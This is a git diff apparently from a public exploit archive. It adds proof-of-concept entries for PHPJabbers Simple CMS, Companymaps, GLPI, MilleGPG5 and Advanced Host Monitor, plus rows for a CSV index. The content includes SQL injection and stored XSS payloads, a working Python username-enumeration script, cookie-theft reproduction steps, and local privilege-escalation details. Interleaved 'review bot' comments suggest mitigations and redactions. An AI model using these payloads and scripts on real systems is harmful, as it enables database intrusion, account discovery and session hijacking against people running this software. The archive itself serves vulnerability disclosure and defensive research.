+section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T \ No newline at end of file 
diff --git a/exploits/php/webapps/51416.txt b/exploits/php/webapps/51416.txt new file mode 100644 index 000000000..2bcd1849a --- /dev/null +++ b/exploits/php/webapps/51416.txt @@ -0,0 +1,40 @@ +# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection +# Date: 2023-04-29 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.phpjabbers.com/faq.php +# Software Link: https://www.phpjabbers.com/simple-cms/ +# Version: 5.0 +# Tested on: Kali Linux + +### Request ### + +GET +/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 +HTTP/1.1 +Accept: */* +x-requested-with: XMLHttpRequest +Referer: https://localhost/simplecms/preview.php?lid=1 +Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844; +_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292; +pjd_simplecms=1; last_position=%2F +Accept-Encoding: gzip,deflate,br +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 +Host: localhost +Connection: Keep-alive + +### Parameter & Payloads ### + +Parameter: column (GET) + Type: boolean-based blind + Title: Boolean-based blind - Parameter replace (original value) + Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869) +THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) +END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 + + Type: error-based + Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (EXTRACTVALUE) + Payload: action=pjActionGetFile&column=2 AND +EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT +(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 \ No newline at end of file diff --git a/exploits/php/webapps/51417.txt b/exploits/php/webapps/51417.txt new file mode 100644 index 000000000..2ba30cf7f --- /dev/null +++ b/exploits/php/webapps/51417.txt 
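Review bot: 51416.txt identifies `column` as injectable but gives no remediation, and the usual advice of bound parameters does not apply here: the parameter appears to feed a sort clause (the request pairs it with `direction=DESC`), and a column identifier cannot be bound. The fix to document is an allow-list, e.g. `Mitigation: map the column value to a fixed set of known column names and reject anything else; accept only ASC or DESC for direction`. The captured request also includes `Cookie:` values from the test session that are best redacted; 51415.txt has the same issue.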
@@ -0,0 +1,20 @@ +# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS) +# Date: 27.04.2023 +# Exploit Author: Lucas Noki (0xPrototype) +# Vendor Homepage: https://github.com/vogtmh +# Software Link: https://github.com/vogtmh/cmaps +# Version: 8.0 +# Tested on: Mac, Windows, Linux +# CVE : CVE-2023-29983 + +*Steps to reproduce:* +1. Clone the repository and install the application +2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token= +3. The payload used is: +4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough. +5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog +6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter + +In a real world case you would need to wait for the admin to log into the application and open the auditlog tab. + +Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload. \ No newline at end of file diff --git a/exploits/php/webapps/51418.py b/exploits/php/webapps/51418.py new file mode 100755 index 000000000..fe2369222 --- /dev/null +++ b/exploits/php/webapps/51418.py 
@@ -0,0 +1,59 @@ +# Exploit Title: GLPI 9.5.7 - Username Enumeration +# Date: 04/29/2023 +# Author: Rafael B. +# Vendor Homepage: https://glpi-project.org/pt-br/ +# Affected Versions: GLPI version 9.1 <= 9.5.7 +# Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz + + +import requests +from bs4 import BeautifulSoup + +# Send a GET request to the page to receive the csrf token and the cookie session +response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1') + +# Parse the HTML using BeautifulSoup +soup = BeautifulSoup(response.content, 'html.parser') + +# Find the input element with the CSRF token +csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')}) + +# Extract the CSRF token if it exists +if csrf_input: + csrf_token = csrf_input['value'] + +# Extract the session cookie +session_cookie_value = None +if response.cookies: + session_cookie_value = next(iter(response.cookies.values())) +# Set the custom url where the GLPI recover password is located +url = "http://127.0.0.1:80/glpi/front/lostpassword.php" +headers = {"User-Agent": "Windows NT 10.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} + +# Open the email list file and read each line +with open('emails.txt', 'r') as f: + email_list = f.readlines() + +# Loop through the email list and make a POST request for each email +for email in email_list: + email = email.strip() + data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token} + cookies = 
{"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value} + freq = requests.post(url, headers=headers, cookies=cookies, data=data) + + # Do a new GET request to get the updated CSRF token and session cookie for the next iteration + response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1') + soup = BeautifulSoup(response.content, 'html.parser') + csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')}) + if csrf_input: + csrf_token = csrf_input['value'] + session_cookie_value = None + if response.cookies: + session_cookie_value = next(iter(response.cookies.values())) + + # Parse the response and grep the match e-mails + soup = BeautifulSoup(freq.content, 'html.parser') + div_center = soup.find('div', {'class': 'center'}) + Result = (f"Email: {email}, Result: {div_center.text.strip()}") + if "An email has been sent to your email address. The email contains information for reset your password." in Result: + print ("\033[1;32m Email Found! -> " + Result) \ No newline at end of file diff --git a/exploits/windows/local/51410.txt b/exploits/windows/local/51410.txt new file mode 100644 index 000000000..5c366f0cf --- /dev/null +++ b/exploits/windows/local/51410.txt 
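Review bot: 51418.py never states the condition that makes enumeration possible: the lost-password page answers a known address with a distinct message, which the script matches on ("An email has been sent to your email address…"). I would add header comments naming that root cause and the fix, e.g. `# Mitigation: return the same response whether or not the address exists, and rate-limit lostpassword.php`. The header lists affected versions 9.1 <= 9.5.7 but no fixed release; add one if it is known. For detection, the loop issues one GET and one POST to `/glpi/front/lostpassword.php` per address, a request pattern worth alerting on.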
@@ -0,0 +1,37 @@
+# Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
+# Date: 2023-04-28
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://millegpg.it/
+# Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/
+# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
+# Version: 5.9.2
+# Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913
+# CVE: CVE-2023-25438
+
+MilleGPG / MilleGPG5 also known as "Governo Clinico 3"
+
+Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.
+
+Affected/tested version: MilleGPG5 5.9.2
+
+Summary:
+Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through the
+Italian general practice network.
+MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes,
+complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for the
+General Practitioner, also offering contextual access to the most authoritative scientific content and CME training.
+
+Vuln desc:
+The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing some
+files to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weakness
+abusing the "write" permission of the main application available to all users on the system or network.
+
+
+Details:
+Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.:
+
+C:\Program Files\MilleGPG5\MilleGPG5.exe (main gui application)
+C:\Program Files\MilleGPG5\plugin\ (GPGCommand.exe, nginx and php files)
+C:\Program Files\MilleGPG5\k-platform\ (api and webapp files)
+
+such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA
\ No newline at end of file
diff --git a/exploits/windows/local/51412.txt b/exploits/windows/local/51412.txt
new file mode 100644
index 000000000..a8116c568
--- /dev/null
+++ b/exploits/windows/local/51412.txt
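Review bot: The "Details" section lists the writable paths and the ACE `BUILTIN\Users:(I)(OI)(CI)(R,W)` but gives an administrator no way to verify or correct the condition, and names no fixed release. A short remediation section would close that gap: check the tree with `icacls "C:\Program Files\MilleGPG5"` and remove write access for `BUILTIN\Users` from the install directory and its `plugin\` and `k-platform\` subfolders, leaving modify rights to administrators and the installer only. "Vuln desc" also says the write permission is available to users "on the system or network", while every listed path is local; the text should say whether a share is actually exposed or drop "or network".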
@@ -0,0 +1,59 @@
+# Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path
+# Date: 2023-04-23
+# CVE: CVE-2023-2417
+# Exploit Author: MrEmpy
+# Vendor Homepage: https://www.ks-soft.net
+# Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm
+# Version: > 12.56
+# Tested on: Windows 10 21H2
+
+
+Title:
+================
+Advanced Host Monitor > 12.56 - Unquoted Service Path
+
+
+Summary:
+================
+An unquoted service path vulnerability has been discovered in Advanced Host
+Monitor version > 12.56 affecting the executable "C:\Program Files
+(x86)\HostMonitor\RMA-Win\rma_active.exe" . This vulnerability occurs when
+the service's path is misconfigured, allowing an attacker to run a
+malicious file instead of the legitimate executable associated with the
+service.
+
+An attacker with local user privileges could exploit this vulnerability to
+replace the legitimate RMA-Win\rma_active.exe service executable with a
+malicious file of the same name and located in a directory that has a
+higher priority than the legitimate directory. That way, when the service
+starts, it will run the malicious file instead of the legitimate
+executable, allowing the attacker to execute arbitrary code, gain
+unauthorized access to the compromised system, or stop the service from
+functioning.
+
+To exploit this vulnerability, an attacker would need local access to the
+system and the ability to write and replace files on the system. The
+vulnerability can be mitigated by correcting the service path to correctly
+quote the full path of the executable, including quotation marks.
+Furthermore, it is recommended that users keep software updated with the
+latest security updates and limit physical and network access to their
+systems to prevent malicious attacks.
+
+
+Proof of Concept:
+================
+
+C:\>sc qc ActiveRMAService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ActiveRMAService
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files
+(x86)\HostMonitor\RMA-Win\rma_active.exe /service
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : KS Active Remote Monitoring Agent
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d0c5ae0e7..49cd5f147 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
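Review bot: The advisory header and the index row added for it disagree: this file declares `# CVE: CVE-2023-2417` and author `MrEmpy`, while the `51412` row added to files_exploits.csv in this same commit leaves the codes column empty and spells the author "Mr Empy", so a search of the index by CVE will presumably miss the entry. The affected range is also ambiguous, because the exploit title says `v12.56` but `# Version: > 12.56` and the summary read as "later than 12.56"; state the tested build and whether `<= 12.56` was meant. The `sc qc` output shows the service as `AUTO_START` under `LocalSystem`, which is the impact-relevant detail, and the summary should say so next to the mitigation of quoting `BINARY_PATH_NAME`.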
@@ -3250,6 +3250,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50773,exploits/hardware/local/50773.sh,"Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation",2022-02-21,ibby,local,hardware,,2022-02-21,2022-02-21,0,,,,,, 24899,exploits/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Local Privilege Escalation",2013-03-29,"Mohammad abou hayt",local,hardware,,2013-03-29,2013-03-29,0,OSVDB-91811,,,,, 50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",2021-09-13,Neurogenesia,local,hardware,,2021-09-13,2021-09-13,0,,,,,, +51414,exploits/hardware/local/51414.py,"FS-S3900-24T4S - Privilege Escalation",2023-05-02,"Daniele Linguaglossa",local,hardware,,2023-05-02,2023-05-02,0,CVE-2023-30350,,,,, 44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware,,2018-03-19,2018-03-19,0,CVE-2015-8088,,,,,https://github.com/hardenedlinux/offensive_poc/blob/0cfe3764a0388e3715b018d1d59ef801f8b16b73/CVE-2015-8088/cve-2015-8088-poc.c 47763,exploits/hardware/local/47763.txt,"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials",2019-12-10,LiquidWorm,local,hardware,,2019-12-10,2019-12-10,0,,,,,, 45785,exploits/hardware/local/45785.md,"Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel",2018-11-02,"Billy Brumley",local,hardware,,2018-11-05,2018-11-05,0,CVE-2018-5407,,,,,https://github.com/bbbrumley/portsmash/tree/e3e7447ba04e1a8a5637cabadf3403faf94f7a56 
@@ -12168,7 +12169,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,,2021-07-01,2021-07-01,0,,,,,, 11409,exploits/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection",2010-02-11,JaMbA,webapps,multiple,80,2010-02-10,2010-11-12,1,OSVDB-62295;CVE-2010-0690,,,,, 38706,exploits/multiple/webapps/38706.txt,"VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",webapps,multiple,,2015-11-16,2015-11-16,0,OSVDB-130352,,,,, -51142,exploits/multiple/webapps/51142.txt,"Virtual Reception v1.0 - Web Server Directory Traversal",2023-03-30,Spinae,webapps,multiple,,2023-03-30,2023-03-30,0,,,,,, +51142,exploits/multiple/webapps/51142.txt,"Virtual Reception v1.0 - Web Server Directory Traversal",2023-03-30,Spinae,webapps,multiple,,2023-03-30,2023-05-02,0,CVE-2023-25289,,,,, 50098,exploits/multiple/webapps/50098.txt,"Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)",2021-07-06,"Andrea D\'Ubaldo",webapps,multiple,,2021-07-06,2021-10-15,0,CVE-2021-42071,,,,, 48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple,,2020-06-01,2020-06-01,0,CVE-2020-3952,,,,, 50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple,,2021-06-24,2021-10-28,0,CVE-2021-21972,,,,, 
@@ -13413,6 +13414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21005,exploits/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",webapps,php,,2012-09-02,2016-11-28,1,CVE-2012-4749;CVE-2012-4748;OSVDB-85146;OSVDB-85145,,,,http://www.exploit-db.comadmidio-2.3.5.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txt 42005,exploits/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",webapps,php,,2017-05-15,2017-05-15,1,CVE-2017-8382,,,,http://www.exploit-db.comadmidio-3.2.8.zip, 45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80,2018-09-03,2018-09-03,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadmidio-3.3.5.zip, +51402,exploits/php/webapps/51402.txt,"admidio v4.2.5 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 36290,exploits/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,webapps,php,,2011-11-07,2015-03-06,1,,,,,,https://www.securityfocus.com/bid/50562/info 9161,exploits/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,webapps,php,,2009-07-14,,1,OSVDB-56235;CVE-2009-2558,,,,, 9153,exploits/php/webapps/9153.txt,"Admin News Tools 2.5 - 'fichier' Remote File Disclosure",2009-07-15,Securitylab.ir,webapps,php,,2009-07-14,,1,OSVDB-55856;CVE-2009-2557,,,,, 
@@ -15999,6 +16001,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50425,exploits/php/webapps/50425.txt,"Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)",2021-10-18,"Aniket Deshmane",webapps,php,,2021-10-18,2021-10-18,0,,,,,, 50404,exploits/php/webapps/50404.txt,"Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)",2021-10-13,"Yash Mahajan",webapps,php,,2021-10-13,2021-10-13,0,,,,,, 50421,exploits/php/webapps/50421.txt,"Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)",2021-10-18,"Aniket Deshmane",webapps,php,,2021-10-18,2021-10-18,0,,,,,, +51417,exploits/php/webapps/51417.txt,"Companymaps v8.0 - Stored Cross Site Scripting (XSS)",2023-05-02,"Lucas Noki (0xPrototype)",webapps,php,,2023-05-02,2023-05-02,0,CVE-2023-29983,,,,, 32875,exploits/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,webapps,php,,2009-03-25,2014-04-15,1,,,,,,https://www.securityfocus.com/bid/34232/info 5834,exploits/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,webapps,php,,2008-06-16,,1,OSVDB-46289;CVE-2008-2791,,,,, 42968,exploits/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,webapps,php,,2017-10-10,2017-10-10,0,,,,,, 
@@ -19039,6 +19042,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51229,exploits/php/webapps/51229.txt,"GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34127,,,,, 49992,exploits/php/webapps/49992.py,"GLPI 9.4.5 - Remote Code Execution (RCE)",2021-06-14,"Brian Peters",webapps,php,,2021-06-14,2021-06-14,0,CVE-2020-11060,,,,, 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,,2021-03-08,2021-03-08,0,,,,,, +51418,exploits/php/webapps/51418.py,"GLPI 9.5.7 - Username Enumeration",2023-05-02,"Rafael B.",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,, 51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,, 51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,, 
@@ -24929,6 +24933,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49784,exploits/php/webapps/49784.py,"OpenEMR 5.0.2.1 - Remote Code Execution",2021-04-21,Hato0,webapps,php,,2021-04-21,2021-04-21,0,,,,,, 50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",2021-09-06,"Allen Enosh Upputori",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-40352,,,,, 14011,exploits/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",webapps,php,,2010-06-24,2010-06-24,1,OSVDB-65745,,,,, +51413,exploits/php/webapps/51413.py,"OpenEMR v7.0.1 - Authentication credentials brute force",2023-05-02,"abhhi (Abhishek Birdawade)",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 17998,exploits/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",webapps,php,,2011-10-19,2011-12-01,1,OSVDB-70134,,,,, 27823,exploits/php/webapps/27823.txt,"openEngine 1.7/1.8 - Template Unauthorized Access",2006-05-08,ck@caroli.info,webapps,php,,2006-05-08,2016-12-23,1,CVE-2006-2280;OSVDB-25359,,,,http://www.exploit-db.comopenengine17.zip,https://www.securityfocus.com/bid/17871/info 17951,exploits/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection Vulnerabilities",2011-10-10,"Stefan Schurtz",webapps,php,,2011-10-10,2011-12-04,0,OSVDB-76155,,,,http://www.exploit-db.comopenengine20_beta4.zip,http://www.rul3z.de/advisories/SSCHADV2011-019.txt 
@@ -25973,6 +25978,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 32241,exploits/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,webapps,php,,2008-08-13,2014-03-14,1,CVE-2008-3682;OSVDB-47382,,,,,https://www.securityfocus.com/bid/30678/info 8658,exploits/php/webapps/8658.txt,"PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Injection",2009-05-11,scriptjunkie,webapps,php,,2009-05-10,,1,OSVDB-54720;CVE-2009-1781;OSVDB-54719;CVE-2009-1780;OSVDB-54718;CVE-2009-1779,,,,, 50699,exploits/php/webapps/50699.txt,"PHP Restaurants 1.0 - SQLi (Unauthenticated)",2022-02-02,"Nefrit ID",webapps,php,,2022-02-02,2022-02-02,0,,,,,, +51398,exploits/php/webapps/51398.txt,"PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting",2023-05-02,Or4nG.M4N,webapps,php,,2023-05-02,2023-05-02,0,,,,,, 36551,exploits/php/webapps/36551.txt,"PHP Ringtone Website - 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,webapps,php,,2012-01-15,2015-03-30,1,,,,,,https://www.securityfocus.com/bid/51418/info 29258,exploits/php/webapps/29258.txt,"PHP RSS Reader 2010 - SQL Injection",2013-10-28,"mishal abdullah",webapps,php,,2013-10-31,2013-10-31,1,OSVDB-99594,,,,, 31022,exploits/php/webapps/31022.txt,"PHP Running Management 1.0.2 - 'index.php' Cross-Site Scripting",2008-01-13,"Christophe VG",webapps,php,,2008-01-13,2014-01-17,1,CVE-2008-0258;OSVDB-40261,,,,,https://www.securityfocus.com/bid/27268/info 
@@ -26761,6 +26767,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 2313,exploits/php/webapps/2313.txt,"phpFullAnnu 5.1 - 'repmod' Remote File Inclusion",2006-09-06,SHiKaA,webapps,php,,2006-09-05,2016-09-09,1,OSVDB-28574;CVE-2006-4644,,,,http://www.exploit-db.comphpfullannu-v5.1.zip, 48497,exploits/php/webapps/48497.txt,"PHPFusion 9.03.50 - Persistent Cross-Site Scripting",2020-05-21,coiffeur,webapps,php,,2020-05-21,2020-05-21,0,,,,,, 49911,exploits/php/webapps/49911.py,"PHPFusion 9.03.50 - Remote Code Execution",2021-05-28,g0ldm45k,webapps,php,,2021-05-28,2021-06-28,1,CVE-2020-24949,,,,"http://www.exploit-db.comPHP-Fusion 9.03.50.zip", +51411,exploits/php/webapps/51411.txt,"PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 7540,exploits/php/webapps/7540.txt,"phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service",2008-12-21,"Anarchy Angel",webapps,php,,2008-12-20,,1,,,,,, 15573,exploits/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,webapps,php,,2010-11-19,2015-07-12,0,,,,,, 3699,exploits/php/webapps/3699.txt,"PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion",2007-04-10,anonymous,webapps,php,,2007-04-09,,1,OSVDB-34811;CVE-2007-2019,,,,, 
@@ -26860,6 +26867,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 32441,exploits/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,webapps,php,,2008-09-29,2014-03-23,1,,,,,,https://www.securityfocus.com/bid/31467/info 30952,exploits/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Cross-Site Request Forgery (Add Admin)",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102221,,,,, 50475,exploits/php/webapps/50475.txt,"PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,php,,2021-11-03,2021-11-03,0,,,,,, +51416,exploits/php/webapps/51416.txt,"PHPJabbers Simple CMS 5.0 - SQL Injection",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,, +51415,exploits/php/webapps/51415.txt,"PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 30953,exploits/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102178;OSVDB-102177;OSVDB-102176,,,,, 30955,exploits/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102225;OSVDB-102224;OSVDB-102220,,,,, 2775,exploits/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,webapps,php,,2006-11-12,,1,OSVDB-30367;CVE-2006-5928;OSVDB-30366;OSVDB-30365;OSVDB-30364,,,,, 
@@ -27079,6 +27088,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42987,exploits/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting (2)",2017-10-13,"Ishaq Mohammed",webapps,php,,2017-10-13,2017-11-17,0,CVE-2017-14619,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip, 43063,exploits/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15727,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip, 33385,exploits/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",webapps,php,,2009-12-01,2016-09-27,1,CVE-2009-4780;OSVDB-60586,,,,http://www.exploit-db.comphpmyfaq-2.5.3.zip,https://www.securityfocus.com/bid/37180/info +51399,exploits/php/webapps/51399.txt,"phpMyFAQ v3.1.12 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 27586,exploits/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php?type' CRLF Injection",2006-04-10,Psych0,webapps,php,,2006-04-10,2013-08-14,1,CVE-2006-1714;OSVDB-24705,,,,,https://www.securityfocus.com/bid/17420/info 27585,exploits/php/webapps/27585.txt,"PHPMyForum 4.0 - 'page' Cross-Site Scripting",2006-04-10,Psych0,webapps,php,,2006-04-10,2016-12-30,1,CVE-2006-1713;OSVDB-24704,,,,,https://www.securityfocus.com/bid/17420/info 7392,exploits/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - Local/Remote File Inclusion",2008-12-09,ZoRLu,webapps,php,,2008-12-08,2016-10-27,1,OSVDB-52751;CVE-2008-6317;OSVDB-18331;CVE-2008-6316;CVE-2008-6315,,,,, 
